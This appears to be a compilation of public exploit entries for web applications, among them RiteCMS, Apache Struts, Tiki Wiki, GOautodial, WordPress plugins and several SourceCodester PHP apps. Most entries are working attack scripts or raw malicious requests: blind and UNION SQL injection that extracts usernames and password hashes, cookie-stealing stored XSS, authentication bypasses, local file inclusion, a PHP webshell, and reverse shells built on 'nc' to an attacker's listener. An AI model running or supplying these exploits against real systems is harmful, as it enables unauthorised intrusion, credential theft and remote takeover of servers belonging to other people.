ISHACK AI BOT

# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage # Date: 2020-16-09 # Exploit Author: nag0mez # Vendor Homepage: https://ultimatepro.codexcube.com/ # Version: <= 2.0.5 # Tested on: Kali Linux 2020.2 # The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database. #!/usr/bin/env python3 #-*- coding: utf-8 -*- import requests import sys # The original vulnerability was found on a server with an invalid SSL certificate, # which Python could not verify. I added the verify=False parameter to avoid SSL check. # The lack of verification results in a warning message from Python. # To get a clean output, we will ignore all warnings. import warnings warnings.filterwarnings("ignore") host = 'https://testurl.test' # Change url = "{}/frontend/get_article_suggestion/".format(host) chars = '1234567890abcdefghijklmnopqrstuvwxyz' hex_chars = 'abcdef1234567890' def send_payload(payload): try: response = requests.post(url, data=payload, verify=False) content = response.text length = len(content) return length except Exception as e: print('Cannot connect to host. Exit.') sys.exit(1) def get_first_user(): found = True known = '' while found: found = False for c in chars: test = known + c payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)} length = send_payload(payload) if length > 2: found = True known += c print(c, end='') sys.stdout.flush() break return known def get_hash(username): found = True known = '' while found: found = False for c in hex_chars: test = known + c payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)} length = send_payload(payload) if length > 2: found = True known += c print(c, end='') sys.stdout.flush() break return known if __name__ == '__main__': print('Exploit started.') print('Guessing username...') username = get_first_user() if username != '': print('\nUsername found: {}'.format(username)) else: print('\nCould not get username! Exit.') sys.exit(1) print('Guessing password SHA512 hash...') sha = get_hash(username) if sha != '': print('\nHash found: {}'.format(sha)) else: print('\nCould not get Hash! Exit.') sys.exit(1)

# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS # Google Dork: N/A # Date: 2020-08-07 # Exploit Author: yusufmalikul # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on: Windows 10 # CVE : N/A Description User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user list on manage user page triggering the payload. POC User side 1. Go to the user registration page http://localhost/loginsystem 2. Enter <img src="x" onerror=alert(document.cookie)> in one of the field (first name, last name, email, or contact) 3. Click sign up Admin side 1. Login to admin panel http://localhost/loginsystem/admin 2. After login successful it will redirect to manage user page 3. Payload triggered

# Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-09-08 # Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # POC 1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php" 2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field. 3- Click on "login", then you will bypass the authentication successfully. # Malicious HTTP POST Requests POST /mobileshop-master/login.php HTTP/1.1 Host: 192.168.1.55:8888 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.55:8888/mobileshop-master/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close Upgrade-Insecure-Requests: 1 email=test%27+or+1%3D1+--+-&password=test123 ========================================================================== POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1 Host: 192.168.1.55:8888 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6 Upgrade-Insecure-Requests: 1 email=test%27+or+1%3D1+--+-&password=test123

# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution # Date: 2020-07-03 # Exploit Author: H0j3n # Vendor Homepage: http://ritecms.com/ # Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download # Version: 2.2.1 # Tested on: Linux # Reference: https://www.exploit-db.com/exploits/48636 # !/usr/bin/python # coding=utf-8 import requests,sys,base64,os from colorama import Fore, Back, Style from requests_toolbelt.multipart.encoder import MultipartEncoder requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Variable CONTENT = '''<form action="index.php" method="post">''' # Header def header(): top = cyan(''' \t _____ _ _ _____ __ __ _____ \t| __ \(_) | / ____| \/ |/ ____| \t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___ \t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < / \t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / / \t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/ ''') return top def info(): top = cyan(''' [+] IP : {0} [+] USERNAME : {1} [+] PASSWORD : {2} '''.format(IP,USER,PASS)) return top # Request Function # Color Function def cyan(STRING): return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET def red(STRING): return Style.BRIGHT+Fore.RED+STRING+Fore.RESET # Main if __name__ == "__main__": print header() print "\t--------------------------------------------------------------" print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |" print "\t--------------------------------------------------------------" print "\t| Reference : https://www.exploit-db.com/exploits/48636 |" print "\t| By : H0j3n |" print "\t--------------------------------------------------------------" if len(sys.argv) == 1: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Please Put IP & Credentials") sys.exit(-1) if len(sys.argv) == 2: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Please Put Credentials") sys.exit(-1) if len(sys.argv) > 3: print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0]) print cyan("\n[-] Only 2 arguments needed please see the usage!") sys.exit(-1) IP = sys.argv[1] USER,PASS = sys.argv[2].split(":") print info() URL='{0}/cms/index.php'.format(IP) URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media' HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"} LOG_INFO = {"username" : USER, "userpw" : PASS} try: with requests.Session() as SESSION: SESSION.get(URL) SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False) except: print red("[-] Check the URL!") sys.exit(-1) if CONTENT in str(SESSION.get(URL_UPLOAD).text): print red("[-] Cannot Login!") sys.exit(-1) else: print cyan("[+] Credentials Working!") LHOST = str(raw_input("Enter LHOST : ")) LPORT = str(raw_input("Enter LPORT : ")) FILENAME = str(raw_input("Enter FileName (include.php) : ")) PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT) FORM_DATA = { 'mode': (None,'filemanager'), 'file': (FILENAME, PAYLOAD), 'directory': (None, 'media'), 'file_name': (None, ''), 'upload_mode': (None, '1'), 'resize_xy': (None, 'x'), 'resize': (None, '640'), 'compression': (None, '80'), 'thumbnail_resize_xy': (None, 'x'), 'thumbnail_resize': (None, '150'), 'thumbnail_compression': (None, '70'), 'upload_file_submit': (None, 'OK - Upload file') } HEADER_UPLOAD = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': URL_UPLOAD } response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD) if FILENAME in response.text: print cyan("\n[+] File uploaded and can be found!") else: print red("[-] File cannot be found or use different file name!") sys.exit(-1) URL_GET = IP + '/media/{0}'.format(FILENAME) OPTIONS = str(raw_input("Exploit Now (y/n)?")) print cyan("\nW0rk1ng!!! Enjoy :)") SESSION.get(URL_GET)

# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection # Google Dork: inurl:index.php?rest_route=3D/wpgmza/ # Date: 2020-09-09 # Exploit Author: Jonatas Fil # Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers # Software Link: https://wordpress.org/plugins/wp-google-maps/ # Version: < 7.11.18 # Tested on: Linux # CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692) #!/bin/bash TARGET="192.168.1.77" curl -k --silent "http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&= fields=3D*+from+wp_users+--+-" | jq

# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated) # Date: 10.8.2020. # Exploit Author: n1x_ [MS-WEB] # Software Homepage: https://wordpress.org/plugins/wp-colorbox/ # Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip # Product Version: 1.1.1 [Description] # WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library. # Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability. [Proof of Concept] # 1. Authorization as user with privileges to write and publish posts # 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post # 3. The code is stored on the post [Example payloads] # Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert(document.cookie)</script>"] # Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink="<script>alert('sampletext')</script>"] [Response] ... <a class="wp-colorbox-youtube" href="http://www.youtube.com/embed/example"><script>alert('sampletext')</script></a> ...

# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution # Google Dork: ext:action | filetype:action # Date: 2020/09/09 # Exploit Author: Jonatas Fil # Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html # Version: <= 2.3.15 # Tested on: Linux # CVE : CVE-2013-2251 #!/usr/bin/python # # coding=utf-8 # # Struts 2 DefaultActionMapper Exploit [S2-016] # Interactive Shell for CVE-2013-2251 # # The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with # "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with # attaching navigational information to buttons within forms. # # https://struts.apache.org/docs/s2-016.html # Jonatas Fil (@exploitation) import requests import sys import readline # Disable SSL requests.packages.urllib3.disable_warnings() # ShellEvil if len(sys.argv) == 2: target = sys.argv[1] # Payload first = target + "?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','" second = "'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}" loop = 1 while loop == 1: cmd = raw_input("$ ") while cmd.strip() == '': cmd = raw_input("$ ") if cmd.strip() == '\q': print("Exiting...") sys.exit() try: headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"} pwn=requests.get(first+cmd+second,headers = headers,verify=False) # Disable SSL if pwn.status_code == 200: print pwn.content # 1337 else: print("Not Vuln !") sys.exit() except Exception,e: print e print("Exiting...") sys.exit() else: # BANNER print(''' __ _ _ _ __ _ _ / _\ |__ ___| | | /__\_ _(_) | \ \| '_ \ / _ \ | |/_\ \ \ / / | | _\ \ | | | __/ | //__ \ V /| | | \__/_| |_|\___|_|_\__/ \_/ |_|_| by Jonatas Fil [@explotation] ''') print("======================================================") print("# Struts 2 DefaultActionMapper Exploit [S2-016] #") print("# USO: python struts.py http://site.com:8080/xxx.action #") print("======================================================") print("bye") sys.exit()

# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting # Date: 21/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses Step 2: use payload <script>alert(document.cookie)</script> in Course and Description field Malicious Request POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793 Content-Length: 478 Origin: http://localhost Connection: close Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re -----------------------------168636252127671582243354784793 Content-Disposition: form-data; name="id" -----------------------------168636252127671582243354784793 Content-Disposition: form-data; name="course" <script>alert(document.cookie)</script> -----------------------------168636252127671582243354784793 Content-Disposition: form-data; name="description" <script>alert(document.cookie)</script> -----------------------------168636252127671582243354784793-- Step 3: Cookie will be reflected each time someone visits the Course List section.

# Exploit Title: Hrsale 2.0.0 - Local File Inclusion # Date: 10/21/2020 # Exploit Author: Sosecure # Vendor Homepage: https://hrsale.com/index.php # Version: version 2.0.0 Description: This exploit allow you to download any readable file from server with out permission and login session. Payload : https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd POC: 1. Access to HRsale application and browse to download path with payload 2. Get /etc/passwd

# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass # Date: 21/10/2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin Step 2: use payload jyot' or 1=1# in user and password field Malicious Request POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/schoolFSS/scheduling/admin/login.php Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 Step 3: You will be logged in as admin.

# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name) # Exploit Author: Adeeb Shah (@hyd3sec) # Date: August 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Version: 1.0 # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 # Vulnerability Details # Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function. # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected. #Steps: 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) 2. Click "Product" 3. Click "Action" in any categories name row 4. Click Edit, then Product Info (tab) 5. In "Product Name" field enter XSS <script>alert("XSS")</script> 6. Click save changes 7. Any page on the webapp expecting that 'Product Name' will trigger the XSS. POST /stock/php_action/editProduct.php HTTP/1.1 Host: 192.168.222.132 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.222.132/stock/product.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477 Content-Length: 938 DNT: 1 Connection: close Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editProductName" <script>alert("hyd3sec")</script> -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editQuantity" 9 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editRate" 1200 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editBrandName" 12 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editCategoryName" 7 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="editProductStatus" 1 -----------------------------147762840819880874581057152477 Content-Disposition: form-data; name="productId" 8 -----------------------------147762840819880874581057152477--

# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload # Author: Balzabu # Discovery Date: 07-23-2020 # Vendor Homepage: https://goautodial.org/ # Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html # Tested Version: 4.0 (Last relase as of today) # Tested on OS: CentOS 7 # STEPS TO REPRODUCE: 1 - Log in as an agent 2 - Write a new message to user goadmin with random subject and text 3 - Attach your webshell to the message 4 - Access your shell at https://www.foo.com/uploads/year/month/shellname.php ( Example: https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php ) 5 - Priv esc and enjoy ... :-)

# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name) # Exploit Author: Adeeb Shah (@hyd3sec) # Date: August 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Version: 1.0 # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 # Vulnerability Details # Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function. # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected. #Steps: 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) 2. Click "Category" 3. Click "Action" in any categories name row 4. Click Edit 5. In "Categories Name" field enter XSS <script>alert("XSS")</script> 6. Click save changes 7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS. POST /stock/php_action/editCategories.php HTTP/1.1 Host: 192.168.222.132 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.222.132/stock/categories.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 102 DNT: 1 Connection: close Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9

# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name) # Exploit Author: Adeeb Shah (@hyd3sec) # Date: August 2, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Version: 1.0 # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 # Vulnerability Details # Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function. # This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected. #Steps: 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) 2. Click "Brand" 3. Click "Action" in any brand name row 4. Click Edit 5. In "Brand Name" field enter XSS <script>alert(1)</script> 6. Click save changes 7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS. POST /stock/php_action/editBrand.php HTTP/1.1 Host: 192.168.222.132 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.222.132/stock/brand.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 78 DNT: 1 Connection: close Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14

# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass # Date: 01.08.2020 (1st August 2020) # Exploit Author: Maximilian Barz aka. Silky # Vendor Homepage: tiki.org # Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip # Version: 21.1 # Tested on: Kali Linux 5.7.0-kali1-amd64 #!/usr/bin/env/python3 import requests import json import lxml.html import sys banner = ''' ████████ ██ ██  ██ ██ ██  ██ ██ ██  ██ ██  ██████  ██  ██     ██    ██ ██  ██  ██ ██  ██ ██ ██  ██  ██       ██ ███  ███  ██  ██ █████   ██ ██  █  ██ ██ █████   ██  █████   ██   ██  ██  ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██  ██      ██  ██  ██  ██ ██  ██ ██  ███ ███  ██ ██  ██ ██  ███████  ██ ██ ██                                                              █████  ██  ██ ████████ ██  ██ ███████ ███  ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███  ██  ██████  ██  ██ ██████  █████  ███████ ███████  ██   ██ ██  ██    ██    ██  ██ ██      ████  ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████  ██  ██   ██  ██  ██  ██   ██ ██   ██ ██      ██       ███████ ██  ██  ██  ███████ █████  ██ ██  ██  ██  ██ ██  ███████  ██  ██ ██  ██ ██ ██  ██  ██████    ████   ██████  ███████ ███████ ███████  ██   ██ ██  ██  ██  ██   ██ ██     ██  ██ ██  ██  ██ ██  ██   ██  ██  ██ ██  ██ ██  ██ ██  ██   ██   ██   ██      ██   ██      ██      ██  ██  ██  ██████   ██  ██  ██ ███████ ██   ████  ██  ██  ██████ ██  ██  ██  ██  ██████  ██   ████   ██████   ██  ██  ██  ██ ███████ ███████                                                                                                                                               Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337 ''' def main(): if(len(sys.argv) < 2): print(banner) print("Usage: %s <host> " % sys.argv[0]) print("Eg: %s 1.2.3.4 " % sys.argv[0]) return rhost = sys.argv[1] url = "http://"+rhost+"/tiki/tiki-login.php" session = requests.Session() def get_ticket(): r = requests.get(url) login_page = r.text.encode('utf-8') html = lxml.html.fromstring(login_page) auth = html.xpath('//input[@name="ticket"]/@value') return str(auth)[2:-2] def get_cookie(): session.get(url) return session.cookies.get_dict() cookie = get_cookie() ticket = get_ticket() payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'} headers = { 'Host': rhost, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzrhost, deflate', 'Referer': 'http://'+rhost+'/tiki/tiki-login.php', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '125', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0', } for i in range(60): r = session.post(url, payload, headers) if("Account requires administrator approval." in r.text): print("Admin Password got removed.") print("Use BurpSuite to login into admin without a password ") if(__name__ == '__main__'): main()

# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload # Date: 22-10-2020 # Exploit Author: Jyotsna Adhana # Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29 # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add #Exploit Fill details Create php shell code with below script <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> Click on Browse Select php file Click Save Access below URL: http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir add system commands after cmd to execute it.

# Exploit Title: Stock Management System 1.0 - SQL Injection # Dork: N/A # Date: 2020-10-22 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Version: 1.0 # Tested on: Linux # CVE: N/A # POC: # 1) # fetchSelectedBrand.php # $brandId = $_POST['brandId']; $sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId"; # curl -i -s -k -X $'POST' \ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php' # # POC: # 2) # fetchSelectedCategories.php # $categoriesId = $_POST['categoriesId']; $sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId"; # curl -i -s -k -X $'POST' \ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php' # # ++ #

#!/usr/bin/python3 import requests import sys import warnings from bs4 import BeautifulSoup import json warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) < 6: print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] req = requests.session() login_creds = { "username":username, "password":password, "mode":"normal"} print("[+] Sendin login request...") login = req.post(url+"/api/core/auth", json = login_creds) if username in login.text: page = url + "/api/terminal/create" payload = { 'command':'nc -e /bin/sh ' + ip + ' ' + port , 'autoclose':True } payload = json.dumps(payload) print("[+] Sending payload...") send_payload = req.post(page, payload) print("[+] Check your listener !...") else: print("[-] Wrong credentials or may the system patched.") exit()

